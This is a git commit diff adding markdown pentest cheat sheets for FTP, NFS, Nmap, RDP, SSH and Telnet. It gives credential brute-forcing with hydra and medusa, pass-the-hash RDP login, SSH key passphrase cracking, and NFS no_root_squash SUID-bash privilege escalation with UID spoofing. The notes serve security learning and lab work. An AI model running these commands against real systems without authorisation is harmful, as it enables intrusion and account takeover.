mirror of
https://github.com/anotherhadi/sec-notes.git
synced 2026-10-05 07:48:23 +02:00
init
This commit is contained in:
@@ -0,0 +1,71 @@
|
||||
---
|
||||
title: "FTP"
|
||||
description: "Enumeration, exploitation and post-exploitation techniques for FTP servers."
|
||||
tags: ["ftp", "network", "service"]
|
||||
publishDate: 2026-04-29
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Enumeration](#enumeration)
|
||||
- [Banner grabbing](#banner-grabbing)
|
||||
- [Nmap](#nmap)
|
||||
- [Anonymous Login](#anonymous-login)
|
||||
- [Brute Force](#brute-force)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
FTP runs on **port 21** (control) and uses a secondary data channel (port 20 for active, ephemeral port for passive).
|
||||
Common implementations: vsftpd, ProFTPD, Pure-FTPd, FileZilla Server, IIS FTP.
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Banner grabbing
|
||||
|
||||
```bash
|
||||
nc -nv $IP 21
|
||||
ftp $IP
|
||||
```
|
||||
|
||||
The banner often reveals the software version: cross-reference with CVE databases.
|
||||
|
||||
### Nmap
|
||||
|
||||
```bash
|
||||
nmap -sV -p 21 $IP
|
||||
nmap -p 21 --script ftp-* $IP
|
||||
```
|
||||
|
||||
Key scripts:
|
||||
|
||||
- `ftp-anon`: checks anonymous login
|
||||
- `ftp-bounce`: tests for FTP bounce attack
|
||||
- `ftp-brute`: brute-force credentials
|
||||
- `ftp-syst`: retrieves system info
|
||||
|
||||
## Anonymous Login
|
||||
|
||||
```bash
|
||||
ftp $IP
|
||||
# Username: anonymous
|
||||
# Password: <empty> or anonymous@
|
||||
```
|
||||
|
||||
If allowed, list and download everything:
|
||||
|
||||
```bash
|
||||
ls -la
|
||||
mget *
|
||||
```
|
||||
|
||||
Check for writable directories: you may be able to upload a webshell if FTP root overlaps with a web root.
|
||||
|
||||
## Brute Force
|
||||
|
||||
```bash
|
||||
hydra -l $user -P ~/wordlists/rockyou.txt ftp://$IP
|
||||
medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M ftp
|
||||
```
|
||||
|
||||
Try default credentials first: `admin:admin`, `ftp:ftp`, `user:password`.
|
||||
@@ -0,0 +1,92 @@
|
||||
---
|
||||
title: "NFS"
|
||||
description: "Enumeration, mounting and privilege escalation techniques for NFS shares."
|
||||
tags: ["nfs", "network", "service"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Enumeration](#enumeration)
|
||||
- [Nmap](#nmap)
|
||||
- [List shares](#list-shares)
|
||||
- [Mount](#mount)
|
||||
- [Privilege Escalation](#privilege-escalation)
|
||||
- [no_root_squash](#no_root_squash)
|
||||
- [UID spoofing](#uid-spoofing)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
NFS (Network File System) runs on **port 2049** and allows remote filesystem mounting over the network.
|
||||
Common on Linux/Unix environments. Access control is defined in `/etc/exports` on the server.
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Nmap
|
||||
|
||||
```bash
|
||||
nmap -sV -p 111,2049 $IP
|
||||
nmap -p 111,2049 --script nfs-* $IP
|
||||
```
|
||||
|
||||
Key scripts:
|
||||
|
||||
- `nfs-showmount`: lists exported shares
|
||||
- `nfs-ls`: lists files in shares
|
||||
- `nfs-statfs`: retrieves disk stats
|
||||
|
||||
### List shares
|
||||
|
||||
```bash
|
||||
showmount -e $IP
|
||||
rpcinfo -p $IP
|
||||
```
|
||||
|
||||
## Mount
|
||||
|
||||
```bash
|
||||
mkdir /mnt/nfs
|
||||
mount -t nfs $IP:/share /mnt/nfs
|
||||
mount -t nfs -o vers=2 $IP:/share /mnt/nfs # force NFSv2
|
||||
umount /mnt/nfs
|
||||
```
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
### no_root_squash
|
||||
|
||||
If the share is exported with `no_root_squash`, the remote root user keeps root privileges on the share.
|
||||
|
||||
Check `/etc/exports` on the server (if readable):
|
||||
|
||||
```bash
|
||||
cat /etc/exports
|
||||
```
|
||||
|
||||
Look for:
|
||||
|
||||
```
|
||||
/share *(rw,no_root_squash)
|
||||
```
|
||||
|
||||
If present, copy a SUID binary onto the share as root from your attacker machine:
|
||||
|
||||
```bash
|
||||
cp /bin/bash /mnt/nfs/bash
|
||||
chmod +s /mnt/nfs/bash
|
||||
```
|
||||
|
||||
Then execute it on the target with `-p` to keep the SUID effective UID:
|
||||
|
||||
```bash
|
||||
/tmp/nfs/bash -p
|
||||
```
|
||||
|
||||
### UID spoofing
|
||||
|
||||
NFS authenticates by UID. If you know a file is owned by UID 1001 on the server, impersonate it directly:
|
||||
|
||||
```bash
|
||||
python3 -c "import os; os.setuid(1001); os.system('/bin/bash')"
|
||||
```
|
||||
+123
@@ -0,0 +1,123 @@
|
||||
---
|
||||
title: "Nmap"
|
||||
description: "Host discovery, port scanning, service detection and NSE scripting"
|
||||
tags: ["nmap", "network", "enumeration"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Host Discovery](#host-discovery)
|
||||
- [Port Scanning](#port-scanning)
|
||||
- [Service & Version Detection](#service--version-detection)
|
||||
- [OS Detection](#os-detection)
|
||||
- [Aggressive Scan](#aggressive-scan)
|
||||
- [Timing Templates](#timing-templates)
|
||||
- [NSE Scripts](#nse-scripts)
|
||||
- [Output Formats](#output-formats)
|
||||
- [Common Profiles](#common-profiles)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
Nmap is a network scanner used for host discovery, port scanning, service/version detection, OS fingerprinting, and vulnerability scripting via NSE.
|
||||
|
||||
## Host Discovery
|
||||
|
||||
```bash
|
||||
nmap -sn 192.168.1.0/24 # ping sweep, no port scan
|
||||
nmap -sn -PR 192.168.1.0/24 # ARP ping (local network)
|
||||
nmap -Pn $IP # skip host discovery, treat as up
|
||||
```
|
||||
|
||||
## Port Scanning
|
||||
|
||||
```bash
|
||||
nmap $IP # top 1000 ports (SYN scan if root)
|
||||
nmap -p 80,443,8080 $IP # specific ports
|
||||
nmap -p 1-65535 $IP # all ports
|
||||
nmap -p- $IP # shorthand for all ports
|
||||
nmap -sU $IP # UDP scan
|
||||
nmap -sU -sS $IP # UDP + SYN together
|
||||
```
|
||||
|
||||
Scan types:
|
||||
|
||||
- `-sS`: SYN scan (stealth, requires root)
|
||||
- `-sT`: TCP connect scan (no root needed)
|
||||
- `-sU`: UDP scan
|
||||
- `-sA`: ACK scan (firewall rule mapping)
|
||||
- `-sN/sF/sX`: Null, FIN, Xmas (evasion, unreliable on Windows)
|
||||
|
||||
## Service & Version Detection
|
||||
|
||||
```bash
|
||||
nmap -sV $IP
|
||||
nmap -sV --version-intensity 9 $IP # more aggressive probing
|
||||
```
|
||||
|
||||
## OS Detection
|
||||
|
||||
```bash
|
||||
nmap -O $IP
|
||||
nmap -O --osscan-guess $IP # guess if not confident
|
||||
```
|
||||
|
||||
## Aggressive Scan
|
||||
|
||||
```bash
|
||||
nmap -A $IP # -sV -O --script=default --traceroute
|
||||
```
|
||||
|
||||
## Timing Templates
|
||||
|
||||
```bash
|
||||
nmap -T0 $IP # paranoid (IDS evasion, very slow)
|
||||
nmap -T1 $IP # sneaky
|
||||
nmap -T3 $IP # normal (default)
|
||||
nmap -T4 $IP # aggressive (faster, good for CTFs)
|
||||
nmap -T5 $IP # insane (may miss results)
|
||||
```
|
||||
|
||||
## NSE Scripts
|
||||
|
||||
```bash
|
||||
nmap --script default $IP
|
||||
nmap --script vuln $IP
|
||||
nmap --script "ftp-*" $IP
|
||||
nmap --script safe $IP
|
||||
nmap --script $script --script-args user=$user,pass=$password $IP
|
||||
```
|
||||
|
||||
Common script categories: `auth`, `brute`, `default`, `discovery`, `dos`, `exploit`, `intrusive`, `safe`, `version`, `vuln`.
|
||||
|
||||
Scripts are located in `/usr/share/nmap/scripts/`.
|
||||
|
||||
## Output Formats
|
||||
|
||||
```bash
|
||||
nmap -oN output.txt $IP # normal
|
||||
nmap -oX output.xml $IP # XML
|
||||
nmap -oG output.gnmap $IP # grepable
|
||||
nmap -oA output $IP # all three at once
|
||||
```
|
||||
|
||||
## Common Profiles
|
||||
|
||||
Quick full scan:
|
||||
|
||||
```bash
|
||||
nmap -p- -T4 --min-rate 5000 -sV -sC -oA full $IP
|
||||
```
|
||||
|
||||
CTF/lab initial recon:
|
||||
|
||||
```bash
|
||||
nmap -sV -sC -p- --open $IP
|
||||
```
|
||||
|
||||
UDP top ports:
|
||||
|
||||
```bash
|
||||
nmap -sU --top-ports 100 $IP
|
||||
```
|
||||
@@ -0,0 +1,54 @@
|
||||
---
|
||||
title: "RDP"
|
||||
description: "Enumeration, exploitation and post-exploitation techniques for RDP servers."
|
||||
tags: ["rdp", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Enumeration](#enumeration)
|
||||
- [Banner grabbing](#banner-grabbing)
|
||||
- [Connect](#connect)
|
||||
- [Brute Force](#brute-force)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
|
||||
Common on Windows servers and workstations.
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Banner grabbing
|
||||
|
||||
```bash
|
||||
nmap -sV -p 3389 $IP
|
||||
nmap -p 3389 --script rdp-* $IP
|
||||
```
|
||||
|
||||
Key scripts:
|
||||
|
||||
- `rdp-enum-encryption`: checks encryption level
|
||||
- `rdp-vuln-ms12-020`: tests for MS12-020 DoS vulnerability
|
||||
|
||||
## Connect
|
||||
|
||||
```bash
|
||||
xfreerdp /u:$user /p:$password /v:$IP
|
||||
xfreerdp /u:$user /p:$password /v:$IP /cert:ignore
|
||||
rdesktop $IP
|
||||
```
|
||||
|
||||
Pass the hash directly (no plaintext password needed):
|
||||
|
||||
```bash
|
||||
xfreerdp /u:$user /pth:$hash /v:$IP
|
||||
```
|
||||
|
||||
## Brute Force
|
||||
|
||||
```bash
|
||||
hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP
|
||||
crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt
|
||||
```
|
||||
@@ -0,0 +1,85 @@
|
||||
---
|
||||
title: "SSH"
|
||||
description: "Enumeration, exploitation and post-exploitation techniques for SSH servers."
|
||||
tags: ["ssh", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Enumeration](#enumeration)
|
||||
- [Banner grabbing](#banner-grabbing)
|
||||
- [Nmap](#nmap)
|
||||
- [Connect](#connect)
|
||||
- [Brute Force](#brute-force)
|
||||
- [Key-Based Auth](#key-based-auth)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
SSH runs on **port 22** and provides an encrypted remote shell.
|
||||
Common implementations: OpenSSH, Dropbear, Bitvise.
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Banner grabbing
|
||||
|
||||
```bash
|
||||
nc -nv $IP 22
|
||||
ssh $IP
|
||||
```
|
||||
|
||||
The banner reveals the software and version (e.g. `OpenSSH_9.2`).
|
||||
|
||||
### Nmap
|
||||
|
||||
```bash
|
||||
nmap -sV -p 22 $IP
|
||||
nmap -p 22 --script ssh-* $IP
|
||||
```
|
||||
|
||||
Key scripts:
|
||||
|
||||
- `ssh-hostkey`: retrieves the server's public key
|
||||
- `ssh-auth-methods`: lists accepted authentication methods
|
||||
- `ssh-brute`: brute-force credentials
|
||||
|
||||
## Connect
|
||||
|
||||
```bash
|
||||
ssh $user@$IP
|
||||
ssh -p 2222 $user@$IP
|
||||
ssh -i id_rsa $user@$IP
|
||||
```
|
||||
|
||||
## Brute Force
|
||||
|
||||
```bash
|
||||
hydra -l $user -P ~/wordlists/rockyou.txt ssh://$IP
|
||||
medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M ssh
|
||||
```
|
||||
|
||||
Only viable if password auth is enabled. Check with:
|
||||
|
||||
```bash
|
||||
ssh -v $user@$IP
|
||||
```
|
||||
|
||||
Look for `publickey,password` in the output.
|
||||
|
||||
## Key-Based Auth
|
||||
|
||||
If you find a private key (`id_rsa`), set permissions and connect:
|
||||
|
||||
```bash
|
||||
chmod 600 id_rsa
|
||||
ssh -i id_rsa $user@$IP
|
||||
```
|
||||
|
||||
If the key is encrypted, crack the passphrase:
|
||||
|
||||
```bash
|
||||
ssh2john id_rsa > hash.txt
|
||||
john hash.txt --wordlist=~/wordlists/rockyou.txt
|
||||
hashcat -m 22921 hash.txt ~/wordlists/rockyou.txt
|
||||
```
|
||||
@@ -0,0 +1,61 @@
|
||||
---
|
||||
title: "Telnet"
|
||||
description: "Enumeration, exploitation and post-exploitation techniques for Telnet servers."
|
||||
tags: ["telnet", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
|
||||
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
|
||||
|
||||
- [Enumeration](#enumeration)
|
||||
- [Banner grabbing](#banner-grabbing)
|
||||
- [Nmap](#nmap)
|
||||
- [Connect](#connect)
|
||||
- [Brute Force](#brute-force)
|
||||
|
||||
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
|
||||
|
||||
Telnet runs on **port 23** and transmits all data (including credentials) in **cleartext**.
|
||||
Common on embedded devices, legacy systems, routers, and IoT equipment.
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Banner grabbing
|
||||
|
||||
```bash
|
||||
nc -nv $IP 23
|
||||
telnet $IP
|
||||
```
|
||||
|
||||
The banner often reveals the OS, hostname, or device type.
|
||||
|
||||
### Nmap
|
||||
|
||||
```bash
|
||||
nmap -sV -p 23 $IP
|
||||
nmap -p 23 --script telnet-* $IP
|
||||
```
|
||||
|
||||
Key scripts:
|
||||
|
||||
- `telnet-ntlm-info`: extracts NTLM info (Windows targets)
|
||||
- `telnet-brute`: brute-force credentials
|
||||
|
||||
## Connect
|
||||
|
||||
```bash
|
||||
telnet $IP
|
||||
telnet $IP 23
|
||||
```
|
||||
|
||||
Login with `user` / `password`. Session is fully interactive once authenticated.
|
||||
|
||||
## Brute Force
|
||||
|
||||
```bash
|
||||
hydra -l $user -P ~/wordlists/rockyou.txt telnet://$IP
|
||||
medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M telnet
|
||||
```
|
||||
|
||||
Try default credentials first. Routers and embedded devices commonly ship with `admin:admin`, `root:root`, or blank passwords.
|
||||
Reference in New Issue
Block a user